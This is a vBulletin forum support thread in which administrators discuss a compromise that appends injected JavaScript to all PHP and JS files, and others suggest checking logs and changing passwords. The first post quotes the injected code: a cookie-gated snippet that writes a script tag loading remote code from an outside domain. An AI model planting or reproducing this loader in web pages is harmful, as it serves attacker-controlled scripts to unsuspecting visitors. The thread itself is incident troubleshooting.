Announcement

Collapse
No announcement yet.

New vulnerability?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] New vulnerability?

    A friend of mine is having problem with 4.2.0 forum due to likely new vulnerability.
    This code is added to all php and js files.

    Code:
    function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
    if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://pagecookie.org/pagecookie.js"></script>');}
    All java functions do not work anymore (edit post etc.).
    He has just disabled all plugins.
    Periodically he has to overwrite all vbulletin files to resolve this problem.
    Last edited by iCrazy; Mon 10 Dec '12, 1:29pm. Reason: write errors

  • #2
    There is no new vulnerability in vBulletin 4.2.0, don't spread such rumours if you don't know how your server got compromised. First of all, check the server logs. If the php files got overwritten, somebody gained access to your FTP. Your server logs will say more.
    No private support, only PM me when I ask for it. Support in the forums only.

    Comment


    • #3
      Originally posted by Hartmut View Post
      If the php files got overwritten
      File are not overwritten but code is added to the end of these ones.
      The administrator has to overwrite original vbulletin files to fix problem.

      Comment


      • #4
        Well, adding code to a file doesn't appear suddenly but somebody who had access to your FTP added this code and overwrote the files. Check the date of when the files have been saved for the last time.

        First thing you have to do now is to change ALL passwords; otherwise you will have the same problem again within a few hours. I remember an exploit in the adobe acrobat reader plugin for browsers which made it possible to read the passwords from FTP programs when they were not encoded. Also I know there was an exploit in vBSEO which made it possible to get ahold of the FTP stats.
        No private support, only PM me when I ask for it. Support in the forums only.

        Comment


        • #5
          I have the exact same problem on two sites with vbulletin residing on two completely different host. They have nothing in common with a few plugins are days that I rewrite the file server and I cleaned all the unnecessary files. After a few hours, maximum one day, the same happens to both and at a distance of a few minutes to one another.

          As the saying icrazy to now if you change all the files automatically, and first of all those ClientScript folder and then all. Js file server.

          The second site with the problem for months walked into ftp, I am the same problem occurred, rule out a problem with the ftp password. I also changed the ftp password, without resolving anything.

          I do not know what to do anymore, possible solutions?

          Comment


          • #6
            Did you contact your host and ask them to check their logs and see what really happened?

            There are no known security issues with the latest versions of vb as of thi smoment. There are some rumors going around about some unknown security issues but they are just that imho, unfounded rumors.

            Comment


            • #7
              Originally posted by borbole View Post
              Did you contact your host and ask them to check their logs and see what really happened?

              There are no known security issues with the latest versions of vb as of thi smoment. There are some rumors going around about some unknown security issues but they are just that imho, unfounded rumors.
              I've tried everything, but I have not yet contacted the host because I have the same problem on two sites that use different hosts, however now this I check now.

              It could be a plugin, but I am not able to isolate one who can create the problem.

              Comment


              • #8
                Are you using the latest version of vb?

                You can alternatively put in a ticket at your vb customer area here so one of the vb staff can investigate this further.

                Comment


                • #9
                  Yes, VB 4.2.0 pl3

                  I am making every attempt, how to clean a server from other software that gho in use, once some of the problem contact the ticket.

                  Comment

                  widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                  Working...
                  X